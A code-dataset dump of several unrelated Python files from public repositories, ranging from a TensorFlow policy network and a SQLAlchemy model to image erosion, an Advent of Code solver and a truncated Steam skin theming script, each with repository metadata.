'state_shape' : [2, 128, 170, 3],
'action_dim' : 8,
'n_action_samples' : 50,
'encode' : {
'encode_depth' : 5,
'encode' : {
1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
}
},
'mlp' : {
'hidden_depth' : 2,
'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
2 : {'num_features' : 1, 'activation' : 'identity'}
}
}
},
'world_model' : default_damian_cfg,
'seed' : 0
}
class LSTMDiscretePolicy:
def __init__(self, cfg):
self.x = x = tf.placeholder(tf.float32, [None] + cfg['state_shape'])
m = ConvNetwithBypasses(**kwargs)
x = feedforward_conv_loop(x, m, cfg, desc = 'size_1_before_concat', bypass_nodes = None, reuse_weights = reuse_weights, batch_normalize = False, no_nonlinearity_end = False)[-1]
x = tf.expand_dims(flatten(x), [0])
lstm_size = cfg['lstm_size']
if use_tf100_api:
lstm = rnn.BasicLSTMCell(lstm_size, state_is_tuple = True)
else:
lstm = rnn.rnn_cell.BasicLSTMCell(lstm_size, state_is_tuple = True)
self.state_size = lstm.state_size
c_init = np.zeros((1, lstm.state_size.c), np.float32)
h_init = np.zeros((1, lstm.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm.state_size.h])
self.state_in = [c_in, h_in]
if use_tf100_api:
state_in = rnn.LSTMStateTuple(c_in, h_in)
else:
state_in = rnn.rnn_cell.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm, x, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = [lstm_c[:1, :], lstm_h[:1, :]]
x = tf.reshape(lstm_outputs, [-1, size])
self.vf = hidden_loop_with_bypasses(x, m, cfg['value'], reuse_weights = False, train = True)
self.logits = hidden_loop_with_bypasses(x, m, cfg['logits'], reuse_weights = False, train = True)
self.sample = categorical_sample(self.logits, ac_space)[0, :]
self.var_list = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, tf.get_variable_scope().name)
def get_initial_features(self):
return self.state_init
def act(self, ob, c, h):
sess = tf.get_default_session()
return sess.run([self.sample, self.vf] + self.state_out,
{self.x: [ob], self.state_in[0]: c, self.state_in[1]: h})
def value(self, ob, c, h):
sess = tf.get_default_session()
return sess.run(self.vf, {self.x: [ob], self.state_in[0]: c, self.state_in[1]: h})[0]
| 83,499 | 127 | 1,629 |
f285b53393c80a26f933621bf1ae088ff4e1744b | 20 | py | Python | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | 1 | 2019-06-22T23:27:48.000Z | 2019-06-22T23:27:48.000Z | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | null | null | null | part1/__init__.py | gdhGaoFei/Python01 | a9fef5290479d575725e2ddbb83c5f2d192606c6 | [
"MIT"
] | null | null | null | print("part1包被导入了~") | 20 | 20 | 0.75 | print("part1包被导入了~") | 0 | 0 | 0 |
4c31524748798164fb9eae86397590e6f331b78e | 3,554 | py | Python | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 56 | 2018-09-26T05:03:51.000Z | 2022-02-16T12:27:46.000Z | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 25 | 2018-08-14T05:33:29.000Z | 2022-02-13T00:50:21.000Z | pipeline/models/User.py | FlyGoat/BangumiN | 3fbf95886b116650820f5fbf4672d771fd1e5aae | [
"MIT"
] | 5 | 2019-08-05T03:59:01.000Z | 2022-01-07T06:44:12.000Z | from dictdiffer import diff
from sqlalchemy import Column, Integer, String
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
| 33.847619 | 119 | 0.619021 | from dictdiffer import diff
from sqlalchemy import Column, Integer, String
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
MAX_NAME_LENGTH = 100
MAX_SIGN_LENGTH = 200
MAX_URL_LENGTH = 200
id = Column('id', Integer, primary_key=True)
username = Column(String(MAX_NAME_LENGTH))
nickname = Column(String(MAX_NAME_LENGTH))
url = Column(String(MAX_URL_LENGTH))
avatar = Column(JSONB)
sign = Column(String(MAX_SIGN_LENGTH))
user_group = Column(Integer)
def __init__(self, user):
parsed_user = self.parse_input(user)
self.set_attribute(parsed_user)
def __repr__(self):
return '<User(id = %s, username = %s)>' % (self.id, self.username)
def update(self, user):
self.parse_input(user)
@staticmethod
def parse_input(user):
"""
parse the raw dict into a normalized one
:param user: raw user
:return: parsed dict
"""
parsed_user = {'id': user.get('id'), 'username': User.truncate_str(user.get('username'), User.MAX_NAME_LENGTH),
'nickname': User.truncate_str(user.get('nickname'), User.MAX_URL_LENGTH),
'url': User.truncate_str(user.get('url'), User.MAX_NAME_LENGTH),
'avatar': User.parse_avatar(user.get('avatar')),
'sign': User.truncate_str(user.get('sign'), User.MAX_SIGN_LENGTH),
'user_group': user.get('usergroup')}
return parsed_user
@staticmethod
def truncate_str(raw_str, max_length):
"""
truncate string to max_length, or return None if it's not a string
:param raw_str: raw string
:param max_length: max length
:return:
"""
if not isinstance(raw_str, str):
return None
return raw_str[:max_length - 2] + '..' if len(raw_str) > max_length else raw_str
@staticmethod
def parse_avatar(raw_avatar):
"""
Parse raw avatar into a normalized one
:param raw_avatar: raw avatar
:return: parsed avatar
"""
if not isinstance(raw_avatar, dict):
return None
max_image_url_length = 200
parsed_images = {
'large': raw_avatar.get('large', 'https://lain.bgm.tv/pic/user/l/icon.jpg')[:max_image_url_length],
'medium': raw_avatar.get('medium', 'https://lain.bgm.tv/pic/user/m/icon.jpg')[:max_image_url_length],
'small': raw_avatar.get('small', 'https://lain.bgm.tv/pic/user/s/icon.jpg')[:max_image_url_length],
}
return parsed_images
def set_attribute(self, parsed_user):
"""
Set attribute in user
:param parsed_user:
:return:
"""
self.id = parsed_user.get('id')
self.username = parsed_user.get('username')
self.nickname = parsed_user.get('nickname')
self.url = parsed_user.get('url')
self.avatar = parsed_user.get('avatar')
self.sign = parsed_user.get('sign')
self.user_group = parsed_user.get('user_group')
def diff_self_with_input(self, subject_dict):
"""
Diff the input dict with current object
:param subject_dict: a dict representation of the subject
:return: a dictdiffer object
"""
difference = diff(self.__dict__, subject_dict, ignore={'_sa_instance_state'})
return difference
| 195 | 3,128 | 23 |
2424f44d4a7d2f813ed93006a67acd97aaa9bb66 | 1,067 | py | Python | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 6 | 2020-11-10T03:07:00.000Z | 2022-02-24T18:07:57.000Z | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 17 | 2020-01-21T16:02:04.000Z | 2022-01-12T15:11:26.000Z | base64/komand_base64/actions/decode/action.py | xhennessy-r7/insightconnect-plugins | 59268051313d67735b5dd3a30222eccb92aca8e9 | [
"MIT"
] | 2 | 2020-12-26T11:33:23.000Z | 2021-09-30T22:22:43.000Z | import komand
from .schema import DecodeInput, DecodeOutput
import base64
| 31.382353 | 73 | 0.554827 | import komand
from .schema import DecodeInput, DecodeOutput
import base64
class Decode(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='decode',
description='Decode Base64 to data',
input=DecodeInput(),
output=DecodeOutput())
def run(self, params={}):
try:
data = params.get('base64')
errors = params.get('errors')
result = base64.standard_b64decode(data)
if errors in ["replace", "ignore"]:
return {'data': result.decode('utf-8', errors=errors)}
else:
return {'data': result.decode('utf-8')}
except Exception as e:
self.logger.error("An error has occurred while decoding ", e)
raise
def test(self):
b64 = 'YmFzZTY0'
result = base64.standard_b64decode(b64).decode('utf-8')
if result == 'base64':
return {'data': result}
raise Exception('Base64 decode failed: %s') % result
| 881 | 7 | 104 |
c6dcf725bd23764de094f21a2a52e9e26e955427 | 1,982 | py | Python | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | 2 | 2020-02-06T17:30:41.000Z | 2020-08-04T10:35:46.000Z | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | null | null | null | augmentation/postprocessor.py | abamaxa/docvision_generator | 8017f29c7d908cb80ddcd59e345a222271fa74de | [
"MIT"
] | null | null | null | import os
import shutil
import json
import time
import cv2
import numpy as np
import PIL
if __name__ == '__main__' :
erode_all(True) | 29.58209 | 88 | 0.639758 | import os
import shutil
import json
import time
import cv2
import numpy as np
import PIL
def convert_image_to_numpy(image) :
(im_width, im_height) = image.size
image_np = np.fromstring(image.tobytes(), dtype='uint8', count=-1, sep='')
array_shape = (im_height, im_width, int(image_np.shape[0] / (im_height * im_width)))
return image_np.reshape(array_shape).astype(np.uint8)
def convert_numpy_to_image(image_np) :
image = PIL.Image.fromarray(image_np)
return image
def postprocess(image, erode_by) :
kernel = np.ones((erode_by, erode_by), np.uint8)
if isinstance(image, PIL.Image.Image) :
image = convert_image_to_numpy(image)
image = cv2.erode(image, kernel)
return convert_numpy_to_image(image)
else :
return cv2.erode(image, kernel)
def save_file(image, original_file, prefix, json_data) :
new_file = prefix + "E-" + original_file
cv2.imwrite(new_file, image)
json_filename = new_file[:-3] + "json"
json_data["filename"] = new_file
with open(json_filename, "w") as json_file :
json.dump(json_data, json_file, indent=4)
def erode_all(save_as_hsv) :
kernel7 = np.ones((7,7),np.uint8)
kernel5 = np.ones((5,5),np.uint8)
kernel3 = np.ones((3,3),np.uint8)
for file in os.listdir('.') :
if not file.lower()[-3:] in ("png, ""jpg") :
continue
print(file)
json_filename = file[:-3] + "json"
with open(json_filename, "r") as json_file :
json_data = json.load(json_file)
image = cv2.imread(file)
if save_as_hsv :
image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)
image3 = cv2.erode(image, kernel3)
save_file(image3, file, "3", json_data)
image5 = cv2.erode(image, kernel5)
save_file(image5, file, "5", json_data)
#image7 = cv2.erode(image, kernel7)
#save_file("7E-" + file, image7)
if __name__ == '__main__' :
erode_all(True) | 1,726 | 0 | 117 |
1f5f867f3aa5f7e0ba66ce34207df1dc5f2a5fb9 | 1,636 | py | Python | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | 05_boarding.py | seanbechhofer/advent_of_code_2020 | 1684b3cab4d8f1792a62a4aa5f18094d6d8b0aad | [
"CC0-1.0"
] | null | null | null | import sys
import unittest
import re
from operator import itemgetter
import argparse
import traceback
# print arg
if __name__=='__main__':
codes = []
for line in sys.stdin:
codes.append(line.strip())
print(part_one(codes))
print(part_two(codes))
| 25.968254 | 90 | 0.562958 | import sys
import unittest
import re
from operator import itemgetter
import argparse
import traceback
class TestStuff(unittest.TestCase):
def data(self):
return [("FBFBBFFRLR",44,5,357),
("BFFFBBFRRR", 70,7,567),
("FFFBBBFRRR",14,7,119),
("BBFFBBFRLL",102,4,820)]
def test_one(self):
cards = self.data()
for card in cards:
code, row, seat, seat_id = card
self.assertTrue(calculate_id(code),seat_id)
def debug(arg):
pass
# print arg
def calculate_id(code):
return int(code.replace('F','0').replace('B','1').replace('L','0').replace('R','1'),2)
#row,col = decode(code)
#return (row * 8) + col
def decode(code):
row = int(code[:7].replace('F','0').replace('B','1'),2)
col = int(code[7:].replace('L','0').replace('R','1'),2)
return (row, col)
def decode2(code):
return int(code.replace('F','0').replace('B','1').replace('L','0').replace('R','1'),2)
def parse(lines):
cards = []
for i in range(0,len(lines)):
card = decode(lines[i])
cards.append(card)
def part_one(codes):
return max(calculate_id(code) for code in codes)
def part_two(codes):
all_seats = sorted([calculate_id(code) for code in codes])
for i in range(0,len(all_seats)):
if i > 0:
if all_seats[i+1] - all_seats[i] != 1:
return all_seats[i] + 1
if __name__=='__main__':
codes = []
for line in sys.stdin:
codes.append(line.strip())
print(part_one(codes))
print(part_two(codes))
| 1,072 | 14 | 274 |
168126d2820d2157fdd1ef197a9231cf648a48f9 | 3,613 | py | Python | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 19 | 2019-07-18T21:38:38.000Z | 2020-10-24T09:23:37.000Z | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 1 | 2019-11-29T02:58:08.000Z | 2019-12-01T06:11:16.000Z | fairseq/models/pronouns.py | liufly/refreader | 25d371fc08d89174cfdac1c7e29984d8cb3beff2 | [
"BSD-3-Clause"
] | 2 | 2019-12-18T11:37:39.000Z | 2020-02-04T16:23:20.000Z | from collections import defaultdict
# name list obtained from: https://www.ssa.gov/oact/babynames/decades/century.html
# accessed on Nov 6th, 2018
if __name__ == '__main__':
lex = PronounLexicon()
all_words = lex.all_words()
in_file_path = "data/CBTest/data/cbt_train.txt"
all_lens = []
all_gaps = []
with open(in_file_path) as f:
for line in f:
line = line.strip()
marked_sentence = [1 if w in all_words else 0 for w in line.split(' ')]
all_lens.append(len(marked_sentence))
# print(marked_sentence)
gaps = find_gaps(marked_sentence)
# print(gaps)
all_gaps.extend(gaps)
import numpy as np
print(np.mean(all_lens), np.std(all_lens))
print(np.mean(all_gaps), np.std(all_gaps))
# l = 32 covers 81.5% of the sentences
# l = 64 covers 98.4% of the sentences
l = 64
print(len(list(filter(lambda x: x <= l, all_lens))) / float(len(all_lens)))
# l = 10 covers 82.7% of the gaps
# l = 20 covers 97.2% of the gaps
# l = 30 covers 99.4% of the gaps
l = 20
print(len(list(filter(lambda x: x <= l, all_gaps))) / float(len(all_gaps)))
| 35.421569 | 104 | 0.549405 | from collections import defaultdict
# name list obtained from: https://www.ssa.gov/oact/babynames/decades/century.html
# accessed on Nov 6th, 2018
class PronounLexicon():
def __init__(self, lexfile='pronouns.tsv'):
self.lexicon = defaultdict(lambda : [])
with open(lexfile) as fin:
for line in fin:
if len(line) > 2:
word = line.split()[0]
feats = dict(x.split('=') for x in line.split()[1].split(','))
for feat,val in feats.items():
self.lexicon['='.join([feat,val])].append(word)
print(f"Read lexicon from {lexfile}:\n{self.lexicon}")
def make_lex(self,feature,dictionary):
'''
given a fairseq dictionary, export a list of word idxs that match a desired feature
'''
return [idx for word,idx in dictionary.indices.items() if word.lower() in self.lexicon[feature]]
def all_word_idxs(self,dictionary):
return [idx for word,idx in dictionary.indices.items() if word.lower() in self.all_words()]
def all_words(self):
output = set()
for subset in self.lexicon.values():
for word in subset:
output.add(word)
return output
def get_feature_set(self, feature_set):
output = set()
for t in feature_set:
output |= set(self.lexicon[t])
return output
def annotate_feature_chunk_end(self, sentence, chunk_tags, feature_set):
pronoun_lexicons = self.get_feature_set(feature_set)
assert len(sentence) == len(chunk_tags)
output = [0 for _ in range(len(sentence))]
for i, (token, chunk_tag) in enumerate(zip(sentence, chunk_tags)):
if token.lower() in pronoun_lexicons:
if chunk_tag == 'O' or chunk_tag[:2] == 'U-':
output[i] = 1
else:
chunk_type = chunk_tag[2:]
for j in range(i, len(sentence)):
end_chunk = chunk_tags[j]
assert end_chunk[2:] == chunk_type
if end_chunk[:2] == 'L-':
output[j] = 1
break
return output
def find_gaps(sentence):
gaps = []
prev, cur = -1, -1
while cur < len(marked_sentence):
if sentence[cur] == 1:
if prev != -1:
gaps.append(cur - prev)
prev = cur
cur += 1
return gaps
if __name__ == '__main__':
lex = PronounLexicon()
all_words = lex.all_words()
in_file_path = "data/CBTest/data/cbt_train.txt"
all_lens = []
all_gaps = []
with open(in_file_path) as f:
for line in f:
line = line.strip()
marked_sentence = [1 if w in all_words else 0 for w in line.split(' ')]
all_lens.append(len(marked_sentence))
# print(marked_sentence)
gaps = find_gaps(marked_sentence)
# print(gaps)
all_gaps.extend(gaps)
import numpy as np
print(np.mean(all_lens), np.std(all_lens))
print(np.mean(all_gaps), np.std(all_gaps))
# l = 32 covers 81.5% of the sentences
# l = 64 covers 98.4% of the sentences
l = 64
print(len(list(filter(lambda x: x <= l, all_lens))) / float(len(all_lens)))
# l = 10 covers 82.7% of the gaps
# l = 20 covers 97.2% of the gaps
# l = 30 covers 99.4% of the gaps
l = 20
print(len(list(filter(lambda x: x <= l, all_gaps))) / float(len(all_gaps)))
| 1,928 | 409 | 50 |
9b8cd41c9a88310c1ecf7675400e3a30e40f64f5 | 547 | py | Python | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | EasyView/migrations/0008_viewpoint_fov.py | technoborsch/AtomREST | 7cdcb79cded8f6f7ee4c56890ab99e99bdfb7adb | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.2.2 on 2021-06-29 09:49
import django.core.validators
from django.db import migrations, models
| 27.35 | 169 | 0.669104 | # Generated by Django 3.2.2 on 2021-06-29 09:49
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('EasyView', '0007_viewpoint_clip_constants_status'),
]
operations = [
migrations.AddField(
model_name='viewpoint',
name='fov',
field=models.FloatField(blank=True, default=60.0, validators=[django.core.validators.MinValueValidator(0.1), django.core.validators.MaxValueValidator(180)]),
),
]
| 0 | 403 | 23 |
d31eb94754bb97b7c63aef350da8ea3fdf10c568 | 70 | py | Python | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | 1 | 2022-02-15T21:30:36.000Z | 2022-02-15T21:30:36.000Z | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | null | null | null | jacdac/button/__init__.py | microsoft/jacdac-python | 712ad5559e29065f5eccb5dbfe029c039132df5a | [
"MIT"
] | 1 | 2022-02-08T19:32:45.000Z | 2022-02-08T19:32:45.000Z | # Autogenerated file.
from .client import ButtonClient # type: ignore
| 23.333333 | 47 | 0.785714 | # Autogenerated file.
from .client import ButtonClient # type: ignore
| 0 | 0 | 0 |
868d426e9569bb6634ef8b4f72fc5b8acd6b361f | 1,938 | py | Python | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | apps/findings/management/commands/import_vulnerability_templates.py | l3l3l/vulnman | f9d520dbf9f6838c459741bb1173a0382d5ecfd6 | [
"MIT"
] | null | null | null | import yaml
import os
from pathlib import Path
from django.conf import settings
from django.core.management.base import BaseCommand
from apps.findings import models
| 41.234043 | 184 | 0.645511 | import yaml
import os
from pathlib import Path
from django.conf import settings
from django.core.management.base import BaseCommand
from apps.findings import models
class Command(BaseCommand):
help = 'Import vulnerability templates from JSON file'
def add_arguments(self, parser):
parser.add_argument('--file', type=str)
def handle(self, *args, **options):
import_counter = 0
if options.get('file'):
self._import_file(options.get('file'), import_counter)
else:
for path in Path(os.path.join(settings.BASE_DIR, 'resources/templates')).rglob('info.yaml'):
self._import_file(path, import_counter)
self.stdout.write(self.style.SUCCESS('Successfully imported/updated "%s" templates' % import_counter))
def _get_description(self, filename):
desc_filename = str(filename).replace("info.yaml", "description_en.md")
with open(desc_filename) as f:
return f.read()
def _get_resolution(self, filename):
desc_filename = str(filename).replace("info.yaml", "resolution_en.md")
with open(desc_filename) as f:
return f.read()
def _import_file(self, filename, import_counter):
with open(filename, "r") as f:
for item in yaml.safe_load(f):
description = self._get_description(filename)
resolution = self._get_resolution(filename)
template, created = models.Template.objects.update_or_create(name=item["name"],
defaults={"description": description, 'cve_id': item.get('cve_id'), 'ease_of_resolution': item.get('ease_of_resolution', "undetermined"), 'resolution': resolution})
if created:
for reference in item.get('references', []):
models.Reference.objects.create(template=template, name=reference)
import_counter += 1
| 1,548 | 201 | 23 |
3971d41dd74aa8b1d61ef664ed7ac809a3618325 | 1,153 | py | Python | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | easymode/tests/testcases/testimportall.py | TGoldR/internationalize | 802e918b41835a7d5406f33cebaff1bdf486649b | [
"MIT"
] | null | null | null | import sys
from django.test import TestCase
error_while_importing = None
try:
from easymode import *
from easymode.admin import *
from easymode.admin.forms import *
from easymode.admin.models import *
from easymode.debug import *
from easymode.i18n import *
from easymode.i18n.admin import *
from easymode.management import *
from easymode.middleware import *
from easymode.management.commands import *
from easymode.templatetags import *
from easymode.tree import *
from easymode.tree.admin import *
from easymode.tree.admin.widgets import *
from easymode.urls import *
from easymode.utils import *
from easymode.views import *
from easymode.xslt import *
except Exception as e:
error_while_importing = e
__all__ = ('TestImportAll',)
class TestImportAll(TestCase):
"""Check if the import all works for every package in easymode"""
def test_import_all(self):
"""All easymode packages should be importable with * without any errors"""
if error_while_importing is not None:
self.fail("%s: %s" % (type(e).__name__, error_while_importing)) | 32.027778 | 83 | 0.711188 | import sys
from django.test import TestCase
error_while_importing = None
try:
from easymode import *
from easymode.admin import *
from easymode.admin.forms import *
from easymode.admin.models import *
from easymode.debug import *
from easymode.i18n import *
from easymode.i18n.admin import *
from easymode.management import *
from easymode.middleware import *
from easymode.management.commands import *
from easymode.templatetags import *
from easymode.tree import *
from easymode.tree.admin import *
from easymode.tree.admin.widgets import *
from easymode.urls import *
from easymode.utils import *
from easymode.views import *
from easymode.xslt import *
except Exception as e:
error_while_importing = e
__all__ = ('TestImportAll',)
class TestImportAll(TestCase):
"""Check if the import all works for every package in easymode"""
def test_import_all(self):
"""All easymode packages should be importable with * without any errors"""
if error_while_importing is not None:
self.fail("%s: %s" % (type(e).__name__, error_while_importing)) | 0 | 0 | 0 |
17f0d3a778365e7cf4affd00494092615fedf153 | 102 | py | Python | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | arcade/intro/d. 36. different-symbols-naive/different_symbols_naive.py | jeury301/code-fights | 379dd541aed0f3918cf1659b635ec51368b0b349 | [
"MIT"
] | null | null | null | from collections import Counter
| 25.5 | 39 | 0.764706 | from collections import Counter
def differentSymbolsNaive(s):
return len(dict(Counter(s)).keys())
| 48 | 0 | 22 |
1089085b26dac1cefaeed0f7ba6549de5f2202fb | 2,107 | py | Python | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 3 | 2022-01-11T04:06:38.000Z | 2022-02-21T13:12:20.000Z | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 8 | 2022-01-22T16:51:46.000Z | 2022-03-31T15:34:11.000Z | viewmodels/home/indexviewmodel.py | prcutler/circuitpythonshow | 9e6ecf416cd8c9fe4625fb9ebac2f5688f73ade7 | [
"MIT"
] | 1 | 2022-01-14T15:24:48.000Z | 2022-01-14T15:24:48.000Z | from starlette.requests import Request
from typing import List, Optional
from viewmodels.shared.viewmodel import ViewModelBase
from services import episode_service
from data.episode import Episode
| 33.983871 | 95 | 0.687708 | from starlette.requests import Request
from typing import List, Optional
from viewmodels.shared.viewmodel import ViewModelBase
from services import episode_service
from data.episode import Episode
class IndexViewModel(ViewModelBase):
def __init__(self, request: Request):
super().__init__(request)
self.episodes: List[Episode] = []
self.episode_count: int = 0
self.episode_number: int = 0
self.guest_firstname: str = ""
self.guest_lastname: str = ""
self.topic: str = ""
self.old_episode_number: Optional[int] = None
self.old_publish_date: Optional[str] = None
self.publish_date: str = ""
self.old_episode_number: Optional[int] = None
self.old_publish_date: Optional[str] = None
self.old_episode: List[Episode] = []
async def load(self):
# self.episode_count: int = await episode_service.get_episode_count()
self.episode_number = await episode_service.get_last_episode_number()
self.episodes = await episode_service.get_episode_info(self.episode_number)
self.publish_date = await episode_service.get_publish_date(self.episode_number)
self.old_episode_number = self.episode_number - 1
print("Old ep #", self.old_episode_number)
self.old_episode = await episode_service.get_episode_info(self.old_episode_number)
self.old_publish_date = await episode_service.get_publish_date(self.old_episode_number)
self.episodes = await episode_service.get_episode_info(self.episode_number)
self.publish_date = await episode_service.get_publish_date(self.episode_number)
if self.episode_number > 1:
self.old_episode_number = self.episode_number - 1
else:
self.old_episode_number = self.episode_number
self.old_episode = await episode_service.get_episode_info(
self.old_episode_number
)
self.old_publish_date = await episode_service.get_publish_date(
self.old_episode_number
)
| 1,815 | 15 | 76 |
4a957084737ee6e07aec48c0b2028bfbead767f9 | 16,779 | py | Python | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 177 | 2017-08-18T10:22:21.000Z | 2022-03-06T23:20:12.000Z | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 77 | 2017-08-18T00:40:15.000Z | 2022-02-11T18:52:10.000Z | wal_steam.py | thereal-S/wal_steam | 0524c0fe5c392b8784d68a692153da8155bd0cd2 | [
"MIT"
] | 36 | 2017-08-23T02:34:14.000Z | 2022-01-03T13:12:02.000Z | #!/usr/bin/env python3
"""
Wal Steam
========================================
oooo oooo .
`888 .8P' .o8
888 d8' .ooooo. .o888oo .oooo.
88888[ d88' `88b 888 `P )88b
888`88b. 888 888 888 .oP"888
888 `88b. 888 888 888 . d8( 888
o888o o888o `Y8bod8P' "888" `Y888""8o
@nilsu.org
=== Copyright (C) 2019 Dakota Walsh ===
"""
import shutil # copying files
import os # getting paths
import urllib.request # downloading the zip files
import zipfile # extracting the zip files
import sys
import argparse # argument parsing
import textwrap
import time
import re
from distutils.dir_util import copy_tree # copytree from shutil is broken so use copy_tree
from argparse import RawTextHelpFormatter
# set some variables for the file locations
HOME_DIR = os.getenv("HOME", os.getenv("USERPROFILE")) # should be crossplatform
CACHE_DIR = os.path.join(HOME_DIR, ".cache", "wal_steam")
CONFIG_DIR = os.path.join(HOME_DIR, ".config", "wal_steam")
SKIN_VERSION = "4.4"
SKIN_NAME = "Metro %s Wal_Mod" % SKIN_VERSION
VERSION = "1.4"
CONFIG_FILE = "wal_steam.conf"
COLORS_FILE = os.path.join(CACHE_DIR, "custom.styles")
CONFIG_URL = "https://raw.githubusercontent.com/kotajacob/wal_steam_config/master/wal_steam.conf"
STEAM_DIR_OTHER = os.path.expanduser("~/.steam/steam/skins")
STEAM_DIR_OSX = os.path.expanduser("~/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/skins")
STEAM_DIR_UBUNTU = os.path.expanduser("~/.steam/skins")
STEAM_DIR_WINDOWS = "C:\Program Files (x86)\Steam\skins"
WAL_COLORS = os.path.join(HOME_DIR, ".cache", "wal", "colors.css")
WPG_COLORS = os.path.join(HOME_DIR, ".config", "wpg", "formats", "colors.css")
METRO_URL = "https://github.com/minischetti/metro-for-steam/archive/v%s.zip" % SKIN_VERSION
METRO_ZIP = os.path.join(CACHE_DIR, "metroZip.zip")
METRO_DIR = os.path.join(CACHE_DIR, "metro-for-steam-%s" % SKIN_VERSION)
METRO_COLORS_FILE = os.path.join(METRO_DIR, "custom.styles")
METRO_PATCH_URL = "https://github.com/redsigma/UPMetroSkin/archive/9.1.12.zip" # A link to the version we've tested rather than the latest, just in case they break things upstream.
METRO_PATCH_ZIP = os.path.join(CACHE_DIR, "metroPatchZip.zip")
METRO_PATCH_DIR = os.path.join(CACHE_DIR, "metroPatchZip")
METRO_PATCH_COPY = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Main Files [Install First]")
METRO_PATCH_HDPI = os.path.join(METRO_PATCH_DIR, "UPMetroSkin-9.1.12", "Unofficial 4.x Patch", "Extras", "High DPI", "Increased fonts", "Install")
MAX_PATCH_DL_ATTEMPTS = 5
# CLI colour and style sequences
CLI_RED = "\033[91m"
CLI_YELLOW = "\033[93m"
CLI_BOLD = "\033[1m"
CLI_END = "\033[0m"
###################
# color functions #
###################
def hexToRgb(hexColors):
"""Convert hex colors to rgb colors (takes a list)."""
